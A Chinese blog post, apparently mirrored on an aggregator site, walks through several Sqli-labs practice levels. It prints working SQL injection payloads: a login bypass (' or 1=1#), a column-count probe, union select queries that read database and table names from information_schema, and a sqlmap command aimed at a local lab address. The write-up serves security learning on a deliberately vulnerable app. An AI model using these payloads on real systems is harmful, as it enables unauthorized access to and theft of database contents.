Sqli-labs - 走看看

zoukankan html css js c++ java

Sqli-labs
GET - Blind - Time based - Single Quotes

GET - Blind - Time based - Double Quotes

以上两题，可用sqlmap解答

POST - Error Based - Single quotes - String

POST表单注入，先用万能密码，尝试报错

如图，尝试在用户名的地方使用万能密码，最后总是在密码的地方报错

说明单引号闭合的地方是跟在密码后面

在用户名的地方随便输入，在密码处输入
```
' or 1=1#
```
使得判断条件为真，登陆成功

猜字段
```
' order by 2#
```
数据库名
```
' union select database(),2#
```
表名
```
' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
```
接下步骤不再赘述

当然sqlmap也能POST注入
```
sqlmap -u http://192.168.147.133/Less-11/ --form --batch --dbs
```
[Sign]做不出ctf题的时候很痛苦，你只能眼睁睁看着其他人领先你
查看全文

相关阅读:
OpenWrt arp 命令发布
 [Cocos2d-x]Cocos2d-x 3.2 学习笔记
 智课雅思词汇---二十四、名词性后缀ary（也是形容词后缀）
算法讲课---1、贪心
 智课雅思词汇---二十三、名词性后缀mony
js进阶---12-11、jquery如何给动态创建出来的元素绑定事件
 js进阶---12-12、jquery事件委托怎么使用
 js进阶---12-10、jquery绑定事件和解绑事件是什么
 新东方雅思词汇---7.3、dioxide
对啊英语音标---四、双元音常见的字母发音组合有哪些

原文地址：https://www.cnblogs.com/echoDetected/p/12856086.html

Copyright © 2011-2022 走看看